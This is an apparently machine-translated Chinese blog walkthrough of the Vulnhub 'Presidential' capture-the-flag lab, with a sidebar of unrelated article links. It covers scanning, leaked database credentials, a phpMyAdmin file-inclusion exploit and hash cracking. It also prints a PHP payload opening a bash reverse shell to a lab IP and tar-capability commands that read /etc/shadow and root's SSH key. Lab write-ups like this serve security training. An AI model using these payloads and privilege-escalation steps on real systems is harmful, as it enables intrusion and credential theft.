当前位置:网站首页>Vulnhub's presidential
Vulnhub's presidential
2022-07-03 11:47:00 【Plum_ Flowers_ seven】
Catalog
3、 ... and 、 Service version discovery
5、 ... and 、 Directory scanning
6、 ... and 、 Subdomain explosion
Nine 、john Of hash It's worth blasting
11、 ... and 、tars Raise the right
One 、nmap The host found
Make one based on ping Scan , Others are a little slow

Two 、 Port scanning

3、 ... and 、 Service version discovery

Four 、 information gathering
1. Home page
As for other functions , Source code division , It doesn't have much effect on us .

5、 ... and 、 Directory scanning
Check one by one , No response , The domain name is collected above , Bind domain name , Trying to .

1. Bind domain name
2./config.php.bak
This one has 107B The data of . Under the source code, we found the name of the database , Account and password

6、 ... and 、 Subdomain explosion
Burst out one database.votenow.local, binding ip, After the visit .

Find a phpmyadmin The login interface of , Combined with the account and password we found earlier , Sign in phpmyadmin.

7、 ... and 、phpmyadmin
1. View version
、
2. Vulnerability search
There are three loopholes , Let's use 44928.txt The file contains a vulnerability .

3. The contents of the document
First use the database to write files , Then let's use the file to contain the execution file
4. Try
Be careful : take sessions Change it to session, Otherwise it won't work
Write the domain name in front , Followed by session Just ok 了

8、 ... and 、 rebound shell
Log out and log in again to get a new session, The remaining steps are similar to the above
select '<?php system('bash -i >& /dev/tcp/192.168.0.107/8888 0>&1');exit;?>'

Nine 、john Of hash It's worth blasting
stay phpmyadmin We also found a user name and hash value
admin $2y$12$d/nOEjKNgk/epF2BeAFaMu8hW4ae3JJk8ITyh48q97awT/G7eQ11i
Try blasting
john hash --wordlist=rockyou.txt
Stella

su admin
and python Go back shell

Ten 、capability
1. View with capability Authority
getcap -r / 2>/dev/null
2. Means :
Permitted
This set defines the upper limit of privileges that a thread can have , yes Inheritable and Effective Superset of sets
Effective
When the kernel checks for privileged operations , Set of actual inspections ( You can add / Delete Effective Medium capabilities, To achieve temporary opening / Function of permission )

3. Check one by one
Find us admin Commands that users can execute .tars We can execute .

11、 ... and 、tars Raise the right
1. Read /etc/shadow
Read compression
tar -cf archive.tar /etc/shadow
decompression
tar -xf archive.tar
Use the inside root Of hash value , Find a dictionary to touch . Finding the right dictionary should be able to crack it

2. Read the private key file
Same as above tarS To read the file , Then decompress . Put it in admin Of .ssh below , And then through ssh Sign in , Mention right to success
ssh -i id_rsa [email protected] -p 2082

Get flag

边栏推荐
- Notes on 32-96 questions of sword finger offer
- How to clean up v$rman_ backup_ job_ Details view reports error ora-02030
- Cacti监控Redis实现过程
- R language uses the aggregate function to calculate the mean value (sum) of dataframe data grouping aggregation without setting na The result of RM calculation. If the group contains the missing value
- Unity3D学习笔记5——创建子Mesh
- 银泰百货点燃城市“夜经济”
- VS2015的下载地址和安装教程
- Web安全总结
- Slam mapping and autonomous navigation simulation based on turnlebot3
- How to make others fear you
猜你喜欢

Extrapolated scatter data

836. 合并集合(DAY 63)并查集

Kibana~Kibana的安装和配置

ArcGIS应用(二十一)Arcmap删除图层指定要素的方法

DS90UB949

STL tutorial 10 container commonalities and usage scenarios

How should intermediate software designers prepare for the soft test

Mmc5603nj geomagnetic sensor (Compass example)

vulnhub之narak

Viewing binary bin files with notepad++ editor
随机推荐
量化计算调研
STL tutorial 10 container commonalities and usage scenarios
vulnhub之narak
Understand go language context in one article
Modular programming of single chip microcomputer
按键切换:按F1-F12都需要按Fn
VS2015的下载地址和安装教程
Numpy np. Max and np Maximum implements the relu function
R language ggplot2 visualization: gganimate package creates dynamic line graph animation (GIF) and uses transition_ The reveal function displays data step by step along a given dimension in the animat
Notes on 32-96 questions of sword finger offer
STL tutorial 8-map
AOSP ~ NTP ( 网络时间协议 )
一些常用术语
Using onvif protocol to operate the device
Based on MCU, how to realize OTA differential upgrade with zero code and no development?
P3250 [hnoi2016] Network + [necpc2022] f.tree path tree section + segment tree maintenance heap
MySQL uses the method of updating linked tables with update
Redis things
Mysql根据时间搜索常用方法整理
Nestjs configuration service, configuring cookies and sessions